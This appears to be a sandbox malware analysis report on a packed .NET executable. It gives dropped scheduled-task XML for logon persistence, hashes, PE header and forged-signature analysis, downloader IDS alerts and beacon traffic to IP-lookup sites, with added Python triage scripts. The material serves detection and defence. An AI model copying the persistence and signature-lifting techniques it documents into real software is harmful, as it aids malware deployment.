                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1581
                                          Entropy (8bit):5.1054923725815
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt6LVxvn:cgergYrFdOFzOzN33ODOiDdKrsuT6/v
                                          MD5:D98D91C46D0BB75226B72B9BA252F7C3
                                          SHA1:38A1246D45028214CD1AE14A5B0FEC91672DC6B4
                                          SHA-256:962680F0399E122AE25E2C328356EF4ED22F02DB5F79E58D58F032868953D9FF
                                          SHA-512:1343B6B74993549984203B058B4B8E2143643556A6E6AC26785BF9C348158770FC9BBE6B04886D1CFAF73D22836A806F6B2F97DE3BAABE0FD7BF7439EA716709
                                          Malicious:true
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                          Process:C:\Users\user\AppData\Roaming\aVmZDnwW.exe
                                          File Type:XML 1.0 document, ASCII text
                                          Category:dropped
                                          Size (bytes):1581
                                          Entropy (8bit):5.1054923725815
                                          Encrypted:false
                                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt6LVxvn:cgergYrFdOFzOzN33ODOiDdKrsuT6/v
                                          MD5:D98D91C46D0BB75226B72B9BA252F7C3
                                          SHA1:38A1246D45028214CD1AE14A5B0FEC91672DC6B4
                                          SHA-256:962680F0399E122AE25E2C328356EF4ED22F02DB5F79E58D58F032868953D9FF
                                          SHA-512:1343B6B74993549984203B058B4B8E2143643556A6E6AC26785BF9C348158770FC9BBE6B04886D1CFAF73D22836A806F6B2F97DE3BAABE0FD7BF7439EA716709
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
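The two XML files above are Task Scheduler definitions dropped by file.exe and by aVmZDnwW.exe; the preview shows a logon trigger, a least-privilege principal and an author that is the same interactive user, and stops before the Actions element. The following is an added triage script, not part of the Joe Sandbox report. It parses a task definition with the standard library and scores the persistence-relevant fields. The embedded sample is constructed from the fields visible in the preview plus an assumed Actions block; the command path C:\Users\user\AppData\Roaming\aVmZDnwW.exe is an assumption (the report shows that executable running from that directory, but the preview does not show what the task launches). The report also lists the file as ASCII text although its declaration says UTF-16, so the loader decodes by BOM and drops the declaration rather than trusting it.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace, as declared on the <Task> element in the dropped file.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Directories an unprivileged user can write to (assumed list, lower-cased).
# A task whose action lives in one of these needed no admin rights to plant.
USER_WRITABLE_DIRS = (
    "\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\",
    "\\users\\public\\", "\\programdata\\",
)

# Constructed sample: the elements the report's preview shows, plus an
# <Actions> block the preview is cut off before. The command path is an
# assumption (the report shows aVmZDnwW.exe running from that directory).
SAMPLE_TASK = b"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\aVmZDnwW.exe</Command>
    </Exec>
  </Actions>
</Task>
"""


def load_task_xml(raw: bytes) -> ET.Element:
    """Parse a task definition file.

    The dropped file is ASCII text whose declaration claims UTF-16, which a
    strict parser rejects. Decode by BOM (UTF-16 only if one is present),
    drop the declaration and parse the rest.
    """
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("latin-1")
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text, count=1).lstrip()
    return ET.fromstring(text)


def _text(root: ET.Element, path: str) -> str:
    el = root.find(path, NS)
    return (el.text or "").strip() if el is not None else ""


def triage_task(raw: bytes) -> dict:
    """Pull the persistence-relevant fields out of a task and score them."""
    root = load_task_xml(raw)
    logon = _text(root, "t:Triggers/t:LogonTrigger/t:Enabled").lower() == "true"
    author = _text(root, "t:RegistrationInfo/t:Author")
    principal = _text(root, "t:Principals/t:Principal/t:UserId")
    run_level = _text(root, "t:Principals/t:Principal/t:RunLevel")
    command = _text(root, "t:Actions/t:Exec/t:Command")
    in_user_dir = any(d in command.lower() for d in USER_WRITABLE_DIRS)

    reasons = []
    if logon:
        reasons.append("runs at every logon")
    if in_user_dir:
        reasons.append("action executes from a user-writable directory")
    if author and author == principal:
        reasons.append("registered by the same interactive user it runs as")
    if run_level == "HighestAvailable":
        reasons.append("requests the highest available integrity level")

    return {
        "command": command,
        "logon_trigger": logon,
        "run_level": run_level,
        "reasons": reasons,
        # A logon-triggered action in a user-writable path is the decisive
        # combination; the other reasons only adjust confidence.
        "suspicious": in_user_dir and logon,
    }


if __name__ == "__main__":
    for key, value in triage_task(SAMPLE_TASK).items():
        print(f"{key}: {value}")
```

On a live host, feed `triage_task` the files under C:\Windows\System32\Tasks (each task is stored there as this same XML) rather than the dropped copy. Per-user installers such as OneDrive also register logon tasks from AppData\Local, so pair a hit with the target binary's hash or signature status before acting on it.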
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):698376
                                          Entropy (8bit):7.698144722404077
                                          Encrypted:false
                                          SSDEEP:12288:xIaOq+A8QSkKd5g3yF369jmP6KXbizoJcPw32Awi7BAkR:iar+5g3yB6tOLizoJX
                                          MD5:92E84C83303CDC492EAAED0E1E4B79C6
                                          SHA1:CE2F5255ABED1A4B241ECDD627F6D247594904AE
                                          SHA-256:82107247E3738A1675CF511DD4C051FB438DD1A973171318E960B406246FCF93
                                          SHA-512:12EDF1453FA0AB19D32A47A0AEF36481ABE66F5BCB30F68028E6924ABCFBD7B0BC87759B36BD6FD978B8CA051B0A6C5E69CD11EAE320459EEB3DA4F5EA922558
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 71%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?ng..............0..N...".......m... ........@.. ....................................@.................................Hm..S....................r...6........................................................... ............... ..H............text....M... ...N.................. ..`.rsrc............ ...P..............@..@.reloc...............p..............@..B.................m......H.......X....k......]........7..................................................L.2..s(lg7..jAL......n6..|...B>..l..Tm.p..a...e....z....R...J.o~...\ZV n.1.....3.....b5.i7.....Q...'nw...Jw.y.U. Y.k......$...$i..I(....iN..?.....Q..._...x.p7.t#.....,.V.j...sv7.'Wf".|.....,..Ig..#......Q.....W.t.9.H..V.E....7.@..[...?.*G.?..z....XBp.....2.S6U._%?......_.<.c<...(.Q..[...>u..:....y...~l..={I,.~.).f.z.,O;.A.N.Vd...9{...FC.31/._}E..@<N....K.Z..U.q......$..y........
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.698144722404077
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:file.exe
                                          File size:698'376 bytes
                                          MD5:92e84c83303cdc492eaaed0e1e4b79c6
                                          SHA1:ce2f5255abed1a4b241ecdd627f6d247594904ae
                                          SHA256:82107247e3738a1675cf511dd4c051fb438dd1a973171318e960b406246fcf93
                                          SHA512:12edf1453fa0ab19d32a47a0aef36481abe66f5bcb30f68028e6924abcfbd7b0bc87759b36bd6fd978b8ca051b0a6c5e69cd11eae320459eeb3da4f5ea922558
                                          SSDEEP:12288:xIaOq+A8QSkKd5g3yF369jmP6KXbizoJcPw32Awi7BAkR:iar+5g3yB6tOLizoJX
                                          TLSH:F9E4F19C3A05F50FC4479F7189B0FE706A345DE6AA02C2039EDB6EEFB55DA468E041D2
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?ng..............0..N...".......m... ........@.. ....................................@................................
                                          Icon Hash:7d324a191b1e0515
                                          Entrypoint:0x4a6d9e
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x676E3F9D [Fri Dec 27 05:48:13 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                          Signature Valid:false
                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                           Signature Validation Error:The digital signature of the object did not verify
                                           Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the PE hash embedded in the signature does not match this file's Authenticode hash, so the certificate table is present but does not vouch for this binary)
                                           Not Before, Not After
                                           • Not Before: 13/11/2018 01:00:00; Not After: 09/11/2021 00:59:59
                                          Subject Chain
                                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                          Version:3
                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                          Serial:7C1118CBBADC95DA3752C46E47A27438
                                           Instruction (entry point 0x4a6d9e, section .text)
                                           jmp dword ptr [00402000h]
                                           add byte ptr [eax], al
                                           (the second line repeats 97 times: the bytes after the six-byte jmp are zero, and 00 00 decodes as add byte ptr [eax], al)
                                           This is the standard native entry stub of a .NET executable: 0x00402000 is Imagebase 0x400000 plus the 8-byte IAT at RVA 0x2000 listed below, whose single entry is mscoree.dll!_CorExeMain. Execution continues in the CLR, so this disassembly says nothing about the managed payload.
                                           Name                                  Virtual Address  Virtual Size  Is in Section
                                           IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_IMPORT          0xa6d48          0x53          .text
                                           IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa8000          0x1ec0        .rsrc
                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_SECURITY        0xa7200          0x3608        (none: for this entry the value is a raw file offset, not an RVA, and the certificate table lies outside every section)
                                           IMAGE_DIRECTORY_ENTRY_BASERELOC       0xaa000          0xc           .reloc
                                           IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                           IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                           Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                           .text   0x2000           0xa4da4       0xa4e00   33464a2439b736a14eb1cdae25449352  False     0.8911743626800607  data       7.699766185970356    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                           .rsrc   0xa8000          0x1ec0        0x2000    ac960054770732c51dfa2b7572289a1f  False     0.83984375          data       7.268220333601979    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                           .reloc  0xaa000          0xc           0x200     295745abbdb0287bd52f2b10ec1bf5c7  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                           The only code section, .text, has an entropy of 7.70 out of a possible 8 bits per byte, which is what compressed or encrypted data looks like rather than ordinary .NET IL; this is consistent with a packed payload that is decrypted at run time.
                                           Name           RVA      Size    Type                                                         Language  Country  ZLIB Complexity
                                           RT_ICON        0xa80e8  0x1af5  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                    0.9340675264454427
                                           RT_GROUP_ICON  0xa9be0  0x14    data                                                                           1.05
                                           RT_VERSION     0xa9bf4  0x2cc   data                                                                           0.4301675977653631
                                           DLL          Import
                                           mscoree.dll  _CorExeMain
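The section table, the data directories and the signature block above can be read together. The script below is an added example, not part of the Joe Sandbox report: `shannon_entropy` reproduces the report's "Entropy (8bit)" metric, and the two triage functions work on the section and directory values copied from the report. One assumption: sections are stored back to back starting at file offset 0x200 (the report prints raw sizes but not raw offsets). Under that assumption the last section ends at 0xa7200, exactly where the report places IMAGE_DIRECTORY_ENTRY_SECURITY, and the certificate table ends at 0xaa808 = 698376, the file size, so the assumption is corroborated by the report's own numbers.

```python
import math
from dataclasses import dataclass


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, from 0.0 to 8.0.
    The report's 'Entropy (8bit)' column is this quantity."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return 0.0 - sum((c / n) * math.log2(c / n) for c in counts if c)


@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: float
    executable: bool  # IMAGE_SCN_MEM_EXECUTE set


# Values copied from the report's section table.
SECTIONS = (
    Section(".text",  0x2000,  0xa4da4, 0xa4e00, 7.699766185970356,   True),
    Section(".rsrc",  0xa8000, 0x1ec0,  0x2000,  7.268220333601979,   False),
    Section(".reloc", 0xaa000, 0xc,     0x200,   0.10191042566270775, False),
)
FILE_SIZE = 698376                # "File size" in the report
SECURITY_DIR = (0xa7200, 0x3608)  # IMAGE_DIRECTORY_ENTRY_SECURITY: file offset, size
FIRST_SECTION_RAW_OFFSET = 0x200  # assumption: headers fill one 0x200 alignment unit


def flag_packed_sections(sections, threshold=7.0):
    """Executable sections whose bytes are near 8 bits/byte of entropy hold
    compressed or encrypted data, not ordinary code: the usual sign of a
    packed payload that is decrypted at run time."""
    return [s.name for s in sections if s.executable and s.entropy >= threshold]


def raw_layout(sections, first_raw=FIRST_SECTION_RAW_OFFSET):
    """Reconstruct raw file ranges assuming sections are stored back to back
    in table order. Returns {name: (start, end)} with end exclusive."""
    layout, offset = {}, first_raw
    for s in sections:
        layout[s.name] = (offset, offset + s.raw_size)
        offset += s.raw_size
    return layout


def authenticode_placement(sections, file_size, security_dir):
    """Where the Authenticode certificate table sits relative to the sections.
    A table starting where the last section's raw data ends and running to EOF
    is an overlay: bytes outside every section that the loader never maps and
    that can be appended to any PE without touching the code."""
    start, size = security_dir
    last_end = max(end for _, end in raw_layout(sections).values())
    return {
        "cert_table_start": start,
        "cert_table_end": start + size,
        "last_section_end": last_end,
        "is_overlay": start >= last_end,
        "reaches_eof": start + size == file_size,
    }


if __name__ == "__main__":
    print("entropy of 4 KiB of zeros:", shannon_entropy(b"\x00" * 4096))
    print("entropy of a uniform byte stream:", shannon_entropy(bytes(range(256)) * 16))
    print("packed-looking executable sections:", flag_packed_sections(SECTIONS))
    for key, value in authenticode_placement(SECTIONS, FILE_SIZE, SECURITY_DIR).items():
        print(f"{key}: {value:#x}" if type(value) is int else f"{key}: {value}")
```

The signature block deserves the same scepticism as the entropy. Error number -2146869232 is 0x80096010 (TRUST_E_BAD_DIGEST): the PKCS#7 blob is present, but the PE hash it signs is not this file's hash. The certificate subject is Simon Tatham, the author of PuTTY, its validity ended in November 2021, and the PE timestamp is December 2024; a certificate table that is simply appended as an overlay is consistent with a signature block lifted from a legitimately signed binary. "Digitally signed: true" therefore carries no weight on its own; only "Signature Valid: true" does.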
                                           Timestamp                        SID      Signature                                          Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
                                           2025-01-02T20:19:45.728728+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.5  49724        193.122.130.0  80         TCP
                                           2025-01-02T20:19:47.151066+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.5  49724        193.122.130.0  80         TCP
                                           2025-01-02T20:19:47.624321+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.5  49728        188.114.97.3   443        TCP
                                           2025-01-02T20:19:48.244406+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.5  49729        193.122.130.0  80         TCP
                                           2025-01-02T20:19:49.494395+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.5  49732        193.122.130.0  80         TCP
                                           2025-01-02T20:19:50.244444+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.5  49734        193.122.130.0  80         TCP
                                           2025-01-02T20:19:50.619445+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.5  49736        193.122.130.0  80         TCP
                                           2025-01-02T20:19:51.166282+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.5  49734        193.122.130.0  80         TCP
                                           2025-01-02T20:19:51.758223+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.5  49744        188.114.97.3   443        TCP
                                           2025-01-02T20:19:52.385016+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.5  49750        193.122.130.0  80         TCP
                                           2025-01-02T20:19:52.688347+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.5  49752        188.114.97.3   443        TCP
                                           2025-01-02T20:19:53.510035+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.5  49761        193.122.130.0  80         TCP
                                           2025-01-02T20:19:56.799969+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.5  49790        188.114.97.3   443        TCP
                                          Jan 2, 2025 20:19:56.648859978 CET44349790188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:56.650895119 CET49790443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:56.650933981 CET44349790188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:56.800009966 CET44349790188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:56.800080061 CET44349790188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:56.800151110 CET49790443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:56.800632954 CET49790443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:56.803942919 CET4978380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.805048943 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.809010983 CET8049783193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:56.809175968 CET4978380192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.809964895 CET8049796193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:56.810044050 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.810107946 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:56.814896107 CET8049796193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:57.263945103 CET8049796193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:57.265337944 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.265361071 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.265503883 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.265786886 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.265798092 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.306924105 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.720971107 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.724678040 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.724705935 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.872256041 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.872318983 CET44349798188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:57.872442007 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.872951984 CET49798443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:57.877166033 CET4980280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.877247095 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.881987095 CET8049802193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:57.882208109 CET8049796193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:57.882325888 CET4979680192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.882436037 CET4980280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.882436037 CET4980280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:57.887161970 CET8049802193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:58.545856953 CET8049802193.122.130.0192.168.2.5
                                          Jan 2, 2025 20:19:58.547339916 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:58.547408104 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:58.547485113 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:58.547807932 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:58.547822952 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:58.588164091 CET4980280192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:59.036500931 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:59.038994074 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:59.039055109 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:59.207258940 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:59.207340002 CET44349808188.114.97.3192.168.2.5
                                          Jan 2, 2025 20:19:59.207433939 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:59.207983017 CET49808443192.168.2.5188.114.97.3
                                          Jan 2, 2025 20:19:59.401166916 CET4976180192.168.2.5193.122.130.0
                                          Jan 2, 2025 20:19:59.401324034 CET4980280192.168.2.5193.122.130.0
                                           Timestamp                           Source Port  Dest Port  Source IP    Dest IP
                                           Jan 2, 2025 20:19:45.090090990 CET  61558        53         192.168.2.5  1.1.1.1
                                           Jan 2, 2025 20:19:45.097460032 CET  53           61558      1.1.1.1      192.168.2.5
                                           Jan 2, 2025 20:19:45.728605032 CET  50730        53         192.168.2.5  1.1.1.1
                                           Jan 2, 2025 20:19:45.735847950 CET  53           50730      1.1.1.1      192.168.2.5
                                           Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
                                           Jan 2, 2025 20:19:45.090090990 CET  192.168.2.5  1.1.1.1  0x48c0    Standard query (0)  checkip.dyndns.org   A (IP address)  IN (0x0001)  false
                                           Jan 2, 2025 20:19:45.728605032 CET  192.168.2.5  1.1.1.1  0x87b5    Standard query (0)  reallyfreegeoip.org  A (IP address)  IN (0x0001)  false
                                           Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                 CName               Address         Type                    Class        DNS over HTTPS
                                           Jan 2, 2025 20:19:45.097460032 CET  1.1.1.1    192.168.2.5  0x48c0    No error (0)  checkip.dyndns.org   checkip.dyndns.com  -               CNAME (Canonical name)  IN (0x0001)  false
                                           Jan 2, 2025 20:19:45.097460032 CET  1.1.1.1    192.168.2.5  0x48c0    No error (0)  checkip.dyndns.com   -                   193.122.130.0   A (IP address)          IN (0x0001)  false
                                           Jan 2, 2025 20:19:45.097460032 CET  1.1.1.1    192.168.2.5  0x48c0    No error (0)  checkip.dyndns.com   -                   132.226.247.73  A (IP address)          IN (0x0001)  false
                                           Jan 2, 2025 20:19:45.097460032 CET  1.1.1.1    192.168.2.5  0x48c0    No error (0)  checkip.dyndns.com   -                   193.122.6.168   A (IP address)          IN (0x0001)  false
                                           Jan 2, 2025 20:19:45.097460032 CET  1.1.1.1    192.168.2.5  0x48c0    No error (0)  checkip.dyndns.com   -                   132.226.8.169   A (IP address)          IN (0x0001)  false
                                           Jan 2, 2025 20:19:45.097460032 CET  1.1.1.1    192.168.2.5  0x48c0    No error (0)  checkip.dyndns.com   -                   158.101.44.242  A (IP address)          IN (0x0001)  false
                                           Jan 2, 2025 20:19:45.735847950 CET  1.1.1.1    192.168.2.5  0x87b5    No error (0)  reallyfreegeoip.org  -                   188.114.97.3    A (IP address)          IN (0x0001)  false
                                           Jan 2, 2025 20:19:45.735847950 CET  1.1.1.1    192.168.2.5  0x87b5    No error (0)  reallyfreegeoip.org  -                   188.114.96.3    A (IP address)          IN (0x0001)  false
                                          • reallyfreegeoip.org
                                          • checkip.dyndns.org
                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                           0           192.168.2.5  49724        193.122.130.0   80                7276  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                           Timestamp                           Bytes transferred  Direction  Data
                                           Jan 2, 2025 20:19:45.114526033 CET  151                OUT        GET / HTTP/1.1
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                          Host: checkip.dyndns.org
                                          Connection: Keep-Alive
                                           Jan 2, 2025 20:19:45.569381952 CET  321                IN         HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:45 GMT
                                          Content-Type: text/html
                                          Content-Length: 104
                                          Connection: keep-alive
                                          Cache-Control: no-cache
                                          Pragma: no-cache
                                          X-Request-ID: 0bf00dbf617257dc04f4df4c7328988f
